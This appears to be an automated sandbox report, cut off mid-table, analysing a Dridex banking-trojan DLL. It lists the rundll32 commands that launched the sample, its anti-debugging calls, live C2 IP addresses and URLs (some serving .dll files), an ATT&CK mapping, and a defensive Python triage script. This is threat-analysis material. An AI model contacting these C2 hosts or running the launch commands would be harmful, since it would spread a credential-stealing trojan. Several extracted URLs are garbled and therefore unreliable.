Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED550A0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED5DCA0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED4D030
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED51020
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED4FDD0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED589F0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED571F0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED4C590
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED4D980
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED5D180
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED3F9A0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED31570
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED47564
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6ED7E210
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED422A0 NtDelayExecution,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED5BE30 NtClose,
Source: SecuriteInfo.com.Variant.Razy.980776.4470.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll'
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Bluewing
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Earth
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Masterjust
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Bluewing
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Earth
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Masterjust
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: classification engine | Classification label: mal76.bank.troj.evad.winDLL@11/2@0/4
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Bluewing
Source: SecuriteInfo.com.Variant.Razy.980776.4470.28989 | Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
Source: SecuriteInfo.com.Variant.Razy.980776.4470.dll | Static file information: File size 1375232 > 1048576
Source: SecuriteInfo.com.Variant.Razy.980776.4470.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: SecuriteInfo.com.Variant.Razy.980776.4470.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb | source: loaddll32.exe, 00000000.00000002.792034242.000000006EDF7000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.816027837.000000006EDF7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.4470.dll
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_3_00B7C762 push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe | Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED43930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED5CEF8 FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6EDA97B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6EDA8B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6EDA47C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6EE7BA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6EE7B942 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6EE7B64D push dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED46C50 KiUserExceptionDispatcher,LdrLoadDll,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6ED47A60 RtlAddVectoredExceptionHandler,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6ED763A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.780512330.0000000001270000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.796914302.00000000039D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.780512330.0000000001270000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.796914302.00000000039D0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.780512330.0000000001270000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.796914302.00000000039D0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: loaddll32.exe, 00000000.00000002.780512330.0000000001270000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.796914302.00000000039D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: loaddll32.exe, 00000000.00000002.780512330.0000000001270000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.796914302.00000000039D0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED42980 GetUserNameW,
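The "System process connects to network" finding above is the one most worth turning into a detection: rundll32.exe, spawned via cmd.exe, opens TLS sessions to four public IPs, three of them on ports other than 443. The script below is an added example, not part of the Joe Sandbox report, that triages network-connection events for exactly that pattern. The event lines are constructed in a Sysmon Event ID 3 (NetworkConnect) key=value shape with Sysmon's field names; the lines themselves, the PROXY_BINARIES set and the field layout are assumptions, while the DRIDEX_C2 endpoints are the ones listed in this report.

```python
"""Triage network-connection events for the behaviour this report flags:
a Windows system binary (here rundll32.exe) talking to the Internet, and
TLS on non-standard ports to the listed Dridex C2 endpoints.

Added example, not part of the Joe Sandbox report. The event lines are
constructed in a Sysmon Event ID 3 (NetworkConnect) key=value shape; the
field names follow Sysmon's, but the lines themselves are made up.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List

# C2 endpoints (host, port) taken from this report's URL and IP tables.
DRIDEX_C2 = {
    ("45.77.0.96", 6891),
    ("185.56.219.47", 8116),
    ("192.46.210.220", 443),
    ("143.244.140.214", 808),
}

# Windows binaries commonly used as injection or DLL-loading hosts that
# have no legitimate reason to open outbound connections by themselves.
# (Assumed list; extend it to match your environment.)
PROXY_BINARIES = {"rundll32.exe", "loaddll32.exe", "regsvr32.exe", "mshta.exe"}

STANDARD_TLS_PORT = 443

# key=value pairs, value either "quoted" or a bare token
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Alert:
    image: str
    dst: str
    port: int
    reason: str


def parse_event(line: str) -> Dict[str, str]:
    """Split a key=value event line into a dict, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def is_public(ip: str) -> bool:
    """True for globally routable addresses; False for RFC1918, loopback, junk."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def triage(line: str) -> List[Alert]:
    """Return every reason a single event deserves attention (may be empty)."""
    ev = parse_event(line)
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    dst = ev.get("DestinationIp", "")
    port = int(ev.get("DestinationPort", "0"))
    alerts: List[Alert] = []
    if (dst, port) in DRIDEX_C2:
        alerts.append(Alert(image, dst, port, "known Dridex C2 endpoint"))
    if image in PROXY_BINARIES and is_public(dst):
        alerts.append(Alert(image, dst, port, "system binary connecting to public IP"))
        if port != STANDARD_TLS_PORT:
            alerts.append(Alert(image, dst, port, "non-standard port"))
    return alerts


def triage_log(lines: List[str]) -> List[Alert]:
    """Run triage over a whole log and flatten the results."""
    found: List[Alert] = []
    for line in lines:
        found.extend(triage(line))
    return found


# Constructed sample events (not taken from the sandbox run).
SAMPLE_LOG = [
    'EventID=3 Image="C:\\Windows\\SysWOW64\\rundll32.exe" DestinationIp=185.56.219.47 DestinationPort=8116',
    'EventID=3 Image="C:\\Windows\\SysWOW64\\rundll32.exe" DestinationIp=192.46.210.220 DestinationPort=443',
    'EventID=3 Image="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" DestinationIp=142.250.74.36 DestinationPort=443',
    'EventID=3 Image="C:\\Windows\\System32\\rundll32.exe" DestinationIp=10.0.0.5 DestinationPort=445',
]

if __name__ == "__main__":
    for a in triage_log(SAMPLE_LOG):
        print(f"{a.image} -> {a.dst}:{a.port}  [{a.reason}]")
```

The behavioural rule (system binary to a public address) is the durable one; the IOC match on host:port will go stale as soon as the botnet rotates infrastructure, so it is kept as a separate reason rather than the only trigger. Note that a rundll32.exe connection to 192.46.210.220:443 still fires on the behavioural rule even though the port looks ordinary.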

MITRE ATT&CK Matrix

The matrix is reproduced per tactic. Techniques the sandbox matched carry the report's signature badges in brackets, copied as extracted; the remaining cells are the unmatched matrix template.

Initial Access: no technique matched. Cells: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: no technique matched. Cells: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: no technique matched. Cells: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Process Injection [112]. Unmatched: Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Process Injection [112]; Obfuscated Files or Information [1]; Rundll32 [1]. Unmatched: Binary Padding; Software Packing; Steganography; Compile After Delivery; Indicator Removal from Tools; Masquerading
Credential Access: no technique matched. Cells: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery (every cell matched): Query Registry [1]; Security Software Discovery [2]; Process Discovery [1]; Account Discovery [1]; System Owner/User Discovery [1]; Remote System Discovery [1]; System Network Configuration Discovery [1]; File and Directory Discovery [1]; System Information Discovery [23]
Lateral Movement: no technique matched. Cells: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data [1]. Unmatched: Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: no technique matched. Cells: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [11]; Non-Standard Port [1]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [2]; Application Layer Protocol [13]. Unmatched: Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: no technique matched. Cells: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: no technique matched. Cells: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: no technique matched. Cells: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

                      Behavior Graph

Behavior Graph ID: 510680
Sample: SecuriteInfo.com.Variant.Ra...
Start date: 28/10/2021
Architecture: WINDOWS
Score: 76

Start -> loaddll32.exe (13); signatures on the start node: Found malware configuration; Yara detected Dridex unpacked file; C2 URLs / IPs found in malware configuration
loaddll32.exe -> signature: Detected Dridex e-Banking trojan
loaddll32.exe -> started: cmd.exe (1); rundll32.exe; rundll32.exe; rundll32.exe
cmd.exe -> started: rundll32.exe (12)
rundll32.exe (child of cmd.exe) -> 185.56.219.47, ports 49758, 49766, 49767 (KELIWEBIT, Italy); 192.46.210.220, ports 443, 49753, 49757 (FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGe, United States); 2 other IPs or domains
rundll32.exe (child of cmd.exe) -> signature: System process connects to network (likely due to code injection or exploit)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Variant.Razy.980776.4470.dll | 2% | ReversingLabs | - | -

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label | Link
https://143.244.140.214:808/hy | 0% | URL Reputation | safe | -
https://195.56.219.47:8116/ | 0% | Avira URL Cloud | safe | -
https://185.56.219.47/Wl | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/: | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/aenh.dll | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/aenh.dll4 | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/4h | 0% | Avira URL Cloud | safe | -
https://45.77.0.96:6891/sg | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/( | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/ | 0% | URL Reputation | safe | -
https://192.46.210.220/Certification | 0% | URL Reputation | safe | -
https://45.77.0.96/ | 0% | URL Reputation | safe | -
https://192.46.210.220/Wl | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/oft | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/( | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/% | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/X | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/Pl | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/oft | 0% | Avira URL Cloud | safe | -
https://45.77.0.96:6891/h.dll | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/coro8 | 0% | Avira URL Cloud | safe | -
https://45.77.0.96:6891/6/ | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/fW | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/ll | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/ | 0% | URL Reputation | safe | -
https://185.56.219.47:8116/Ub | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/llUb | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/soft | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/ll8b | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/GlobalSign | 0% | URL Reputation | safe | -
https://143.244.140.214:808/la | 0% | Avira URL Cloud | safe | -
https://45.77.0.96:6891/14 | 0% | Avira URL Cloud | safe | -
https://145.56.219.47:8116/ | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/ll | 0% | Avira URL Cloud | safe | -
https://143.244.140.214/ | 0% | URL Reputation | safe | -
https://192.46.210.220/jl | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/My | 0% | URL Reputation | safe | -
https://143.244.140.214:808/frthe.computer | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/4.140.214:808/hy | 0% | Avira URL Cloud | safe | -
https://185.56.219.47/ | 0% | URL Reputation | safe | -
https://185.56.219.47:8116/4&b | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/l3 | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/.140.214:808/hy | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/El | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/h | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/al | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/b | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/(u1 | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/k | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/em32 | 0% | Avira URL Cloud | safe | -
https://143.244.140.214:808/l | 0% | URL Reputation | safe | -
https://143.244.140.214:808/g_ | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/R | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/Yl | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/O | 0% | Avira URL Cloud | safe | -
https://45.77.0.96:6891/graphy | 0% | URL Reputation | safe | -
https://143.244.140.214:808/ | 0% | URL Reputation | safe | -
https://185.56.219.47:8116/h | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/4l | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/Nl | 0% | Avira URL Cloud | safe | -
https://45.77.0.96:6891/ | 0% | URL Reputation | safe | -
https://45.77.0.96:6891/0 | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/2 | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/0 | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/en-US | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/k | 0% | Avira URL Cloud | safe | -
https://19.77.0.96:6891/ | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/ography | 0% | URL Reputation | safe | -
https://185.56.219.47:8116/4.140.214:808/h | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/=l | 0% | Avira URL Cloud | safe | -
https://192.46.210.220/f | 0% | Avira URL Cloud | safe | -
https://185.56.219.47:8116/Ps% | 0% | Avira URL Cloud | safe | -
https://45.77.0.96:6891/Microsoft | 0% | URL Reputation | safe | -
https://192.46.210.220/sl | 0% | Avira URL Cloud | safe | -

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://192.46.210.220/ | true | URL Reputation: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation

https://143.244.140.214:808/hy
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.525073328.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.643705364.000000000099D000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://195.56.219.47:8116/
  Source: loaddll32.exe, 00000000.00000002.780745160.00000000033C0000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47/Wl
  Source: loaddll32.exe, 00000000.00000003.408320387.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/:
  Source: loaddll32.exe, 00000000.00000003.660175642.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/aenh.dll
  Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/aenh.dll4
  Source: loaddll32.exe, 00000000.00000003.733634731.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/4h
  Source: loaddll32.exe, 00000000.00000003.708708874.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://45.77.0.96:6891/sg
  Source: loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/(
  Source: loaddll32.exe, 00000000.00000003.525073328.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/
  Source: rundll32.exe, 00000004.00000002.785394155.00000000035BD000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://192.46.210.220/Certification
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://45.77.0.96/
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://192.46.210.220/Wl
  Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/oft
  Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/(
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/%
  Source: loaddll32.exe, 00000000.00000003.618146216.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/X
  Source: loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/Pl
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/oft
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.708708874.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.668641353.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.700253725.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.660175642.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://45.77.0.96:6891/h.dll
  Source: loaddll32.exe, 00000000.00000003.407113242.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://192.46.210.220/coro8
  Source: loaddll32.exe, 00000000.00000003.457343535.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://45.77.0.96:6891/6/
  Source: loaddll32.exe, 00000000.00000003.652034067.000000000099D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.725338491.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/fW
  Source: loaddll32.exe, 00000000.00000003.600285042.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://143.244.140.214:808/ll
  Source: loaddll32.exe, 00000000.00000003.618146216.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/Ub
  Source: loaddll32.exe, 00000000.00000003.583869390.000000000099D000.00000004.00000001.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://185.56.219.47:8116/llUb
